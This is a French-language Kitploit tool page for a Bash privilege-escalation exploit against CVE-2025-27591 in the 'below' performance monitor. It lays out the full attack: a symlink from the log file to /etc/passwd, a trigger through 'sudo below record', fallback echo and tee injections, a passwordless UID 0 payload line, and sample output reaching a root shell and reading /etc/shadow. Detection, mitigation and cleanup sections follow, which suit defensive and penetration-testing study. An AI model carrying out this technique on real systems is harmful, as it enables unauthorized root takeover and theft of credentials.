Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Un exploit d'escalade de privilèges basé sur Bash ciblant l'outil de surveillance des performances système `below`. Cet exploit remanié exploite une vulnérabilité de lien symbolique dans le mécanisme de journalisation pour injecter un utilisateur root dans `/etc/passwd`, obtenant un accès root complet. | Kitploit
Outils/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
2il y a 9 moisPas encore vérifié

À propos

Un exploit d'escalade de privilèges basé sur Bash ciblant l'outil de surveillance des performances système `below`. Cet exploit remanié exploite une vulnérabilité de lien symbolique dans le mécanisme de journalisation pour injecter un utilisateur root dans `/etc/passwd`, obtenant un accès root complet.

Partager

Achetez-moi une connaissance

Exploit CVE-2025-27591 - Attaque par lien symbolique du logger Below

Un exploit d'élévation de privilèges basé sur Bash ciblant l'outil de surveillance des performances système below. Cet exploit remanié exploite une vulnérabilité de lien symbolique dans le mécanisme de journalisation pour injecter un utilisateur root dans /etc/passwd, obtenant un accès root complet.

Crédits

Découvert et signalé par Matthias Gerstner @ SUSE - Avis de sécurité

Détails de la vulnérabilité

  • CVE : CVE-2025-27591
  • Composant affecté : /usr/bin/below (moniteur de performances système de Facebook)
  • Versions affectées : versions de below avec des répertoires de journaux modifiables par tout le monde
  • Type de vulnérabilité : Attaque par lien symbolique / Élévation de privilèges
  • Vecteur d'attaque : /var/log/below/error_root.log → /etc/passwd
  • Score CVSS : Élevé (Élévation de privilèges vers root)

Aperçu

L'outil de surveillance below enregistre les erreurs dans /var/log/below/error_root.log lorsqu'il s'exécute avec des privilèges élevés. Si le répertoire de journalisation est modifiable par tout le monde, un attaquant peut :

  1. Créer un lien symbolique de error_root.log vers /etc/passwd
  2. Déclencher la commande below record pour écrire des messages d'erreur dans le lien symbolique
  3. Injecter manuellement une entrée utilisateur malveillante avec UID=0 (privilèges root)
  4. Lancer un shell root en utilisant le nouvel utilisateur créé

Cet exploit automatise l'ensemble du processus avec des mécanismes de repli intelligents pour gérer diverses configurations système.

Diagramme de flux de l'exploit

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Get Username from User]
    B --> C{Check /var/log/below<br/>World-Writable?}
    C -->|No| D[Exit: Not Vulnerable]
    C -->|Yes| E[Remove Existing error_root.log]
    E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
    F --> G{Symlink Created<br/>Successfully?}
    G -->|No| D
    G -->|Yes| H[Execute: sudo below record]
    H --> I[Wait 3 seconds for logging]
    I --> J[Kill below process]
    J --> K{Payload in<br/>/etc/passwd?}
    K -->|Yes| M[Success Path]
    K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
    L --> N{Manual Injection<br/>Success?}
    N -->|No| O[Try Fallback:<br/>sudo tee -a]
    N -->|Yes| M
    O --> P{Fallback<br/>Success?}
    P -->|No| D
    P -->|Yes| M
    M --> Q[Verify Payload in /etc/passwd]
    Q --> R[Disable Cleanup Trap]
    R --> S[Execute: su username]
    S --> T[Root Shell Obtained]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

Détails techniques

Étapes de l'exploitation

  1. Phase de pré-vérification

    • Vérifier que le répertoire /var/log/below existe
    • Vérifier que le répertoire a les permissions modifiables par tout le monde (o+w)
    • Tester la capacité de création de lien symbolique
  2. Phase de configuration

    • Supprimer tout fichier error_root.log existant
    • Créer le lien symbolique : /var/log/below/error_root.log → /etc/passwd
    • Vérifier que le lien symbolique pointe vers la cible correcte
  3. Phase d'injection (méthode principale)

    • Exécuter sudo below record en arrière-plan
    • Laisser le processus s'exécuter pendant 3 secondes pour déclencher la journalisation des erreurs
    • Tuer le processus pour éviter une journalisation continue
    • Vérifier si les messages d'erreur ont corrompu /etc/passwd de manière utile
  4. Phase d'injection (méthodes de repli)

    • Méthode 1 : Ajout direct via symlink (echo >> symlink)
    • Méthode 2 : Utilisation de sudo avec tee (sudo tee -a)

Structure de la charge utile

L'entrée injectée dans /etc/passwd suit ce format :

root@kitploit:~
username::0:0:username:/root:/bin/bash

Analyse des champs :

  • username : Nom d'utilisateur fourni par l'utilisateur (par défaut : "0xdtc")
  • :: : Champ de mot de passe vide (aucun mot de passe requis)
  • 0:0 : UID=0, GID=0 (privilèges root)
  • username : Champ GECOS (description de l'utilisateur)
  • /root : Répertoire personnel
  • /bin/bash : Shell de connexion

Prérequis

  • Système cible exécutant le binaire below vulnérable
  • Le répertoire /var/log/below doit être modifiable par tout le monde
  • L'utilisateur doit avoir un accès sudo pour exécuter below record
  • Environnement shell Bash

Utilisation

Exécution de base

root@kitploit:~
# Rendre le script exécutable
chmod +x CVE-2025-27591

# Exécuter l'exploit
./CVE-2025-27591

Invites interactives

root@kitploit:~
========================================
  Exploit CVE-2025-27591 (Bash)
========================================

[*] Cet exploit va créer un nouvel utilisateur root dans /etc/passwd
[?] Entrez le nom d'utilisateur pour le nouvel utilisateur root (par défaut : 0xdtc) : monutilisateur
[+] Nom d'utilisateur utilisé : monutilisateur

Exemple de sortie

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  Exploit CVE-2025-27591 (Bash)
========================================

[*] Cet exploit va créer un nouvel utilisateur root dans /etc/passwd
[?] Entrez le nom d'utilisateur pour le nouvel utilisateur root (par défaut : 0xdtc) : 0xdtc
[+] Nom d'utilisateur utilisé : 0xdtc

[*] Vérification de la vulnérabilité CVE-2025-27591
[+] /var/log/below est modifiable par tout le monde
[*] Test de création de lien symbolique
[+] Test de lien symbolique réussi
[+] La cible est vulnérable

[*] Début de l'exploitation
[+] Charge utile écrite dans /tmp/exploit_payload
[*] Création du lien symbolique : /var/log/below/error_root.log -> /etc/passwd
[+] Lien symbolique créé
[*] Exécution de 'sudo below record' pour déclencher la journalisation
[*] 'below record' démarré avec PID : 12345
[*] Vérification si la charge utile a été écrite
[*] Tentative d'injection manuelle
[*] Ajout de la charge utile à /etc/passwd via le lien symbolique
[+] Charge utile ajoutée
[+] Exploitation terminée ! La charge utile est dans /etc/passwd
[*] Ouverture du shell root via 'su 0xdtc'
[*] Le mot de passe doit être vide, appuyez simplement sur Entrée

root@kali:/tmp# whoami
root

Fonctionnalités

Gestion intelligente des bloqueurs

Le script inclut plusieurs mécanismes de repli pour gérer diverses configurations système :

  1. Gestion des fichiers existants

    • Détecte et supprime automatiquement les fichiers journaux existants
    • Gère à la fois les fichiers normaux et les liens symboliques existants
    • Valide la cible du lien symbolique avant de procéder
  2. Méthodes d'injection multiples

    • Principale : Déclenchement via la journalisation d'erreurs de below record
    • Repli 1 : Ajout direct au lien symbolique
    • Repli 2 : Écriture privilégiée avec sudo tee
  3. Gestion des processus

    • Tue automatiquement les processus below bloqués
    • Empêche l'épuisement des ressources
    • Gère le nettoyage des processus en cas d'échec
  4. Détection de réexécution

    • Vérifie si la charge utile existe déjà dans /etc/passwd
    • Ignore l'exploitation si l'utilisateur a déjà été créé
    • Ouvre directement le shell lors d'une nouvelle exécution

Fonctionnalités de qualité du code

  • Commentaires complets : Chaque fonction et étape critique est documentée
  • En-têtes de sections : Code organisé en sections logiques
  • Gestion des erreurs : Vérification appropriée des erreurs et retour d'information à l'utilisateur
  • Sortie propre : Gestionnaires de piège pour un nettoyage gracieux en cas d'échec
  • Dépendances minimales : Bash pur avec des outils Unix standard

Structure des fichiers

root@kitploit:~
.
├── CVE-2025-27591           # Script d'exploitation principal
├── README.md                # Cette documentation
└── /tmp/exploit_payload     # Fichier de charge utile temporaire (créé à l'exécution)

Vérification

Après une exploitation réussie, vérifiez l'accès root :

root@kitploit:~
# Vérifier l'utilisateur actuel
root@target:/tmp# whoami
root

# Vérifier l'ID utilisateur et les groupes
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Vérifier l'utilisateur dans /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Lire les fichiers réservés à root
root@target:/tmp# cat /etc/shadow
[... contenu du fichier shadow ...]

Nettoyage

Si vous devez supprimer l'utilisateur malveillant après les tests :

root@kitploit:~
# Supprimer l'utilisateur injecté de /etc/passwd
sudo sed -i '/^nom_utilisateur:/d' /etc/passwd

# Supprimer les liens symboliques restants
rm -f /var/log/below/error_root.log

Remplacez nom_utilisateur par le nom d'utilisateur que vous avez utilisé lors de l'exploitation.

Détection et atténuation

Méthodes de détection

  1. Surveillance de l'intégrité des fichiers

    root@kitploit:~
    # Surveiller /etc/passwd pour les modifications non autorisées
    aide --check
    
  2. Détection des liens symboliques

    root@kitploit:~
    # Rechercher les liens symboliques suspects dans les répertoires de journaux
    find /var/log -type l -ls
    
  3. Journaux d'audit

    root@kitploit:~
    # Vérifier l'utilisation suspecte de sudo
    grep "below record" /var/log/auth.log
    

Stratégies d'atténuation

  1. Corriger les permissions des répertoires

    root@kitploit:~
    # Supprimer la permission d'écriture pour tout le monde du répertoire de journaux
    sudo chmod 755 /var/log/below
    
  2. Politiques AppArmor/SELinux

    • Mettre en place des contrôles d'accès obligatoires
    • Restreindre les emplacements d'écriture de fichiers du binaire below
  3. Mettre à jour Below

    • Appliquer les correctifs de sécurité de Facebook/Meta
    • Utiliser les mises à jour du gestionnaire de paquets
  4. Surveiller /etc/passwd

    • Mettre en place une surveillance de l'intégrité des fichiers (AIDE, Tripwire)
    • Alerter en cas d'ajout d'utilisateur avec UID=0

Avertissement légal

Cet exploit est destiné à des fins éducatives et aux tests d'intrusion autorisés uniquement.

L'accès non autorisé aux systèmes informatiques est illégal. Utilisez cet outil uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite pour effectuer des tests de sécurité. Le(s) auteur(s) décline(nt) toute responsabilité en cas d'utilisation abusive de cet outil.

En utilisant cet exploit, vous reconnaissez que vous :

  • Disposez d'une autorisation appropriée pour tester le système cible
  • Comprenez les lois et réglementations applicables
  • Acceptez l'entière responsabilité de vos actions

Dépôt : https://github.com/0xDTC/ Auteur : Divine Clown (0xDTC) Licence : Usage éducatif uniquement Dernière mise à jour : 2025-11-13

Télécharger l’outil
Phase d'ouverture du shell
  • Vérifier que l'utilisateur malveillant existe dans /etc/passwd
  • Désactiver les pièges de nettoyage pour empêcher la suppression
  • Exécuter su <nom_utilisateur> pour obtenir un shell root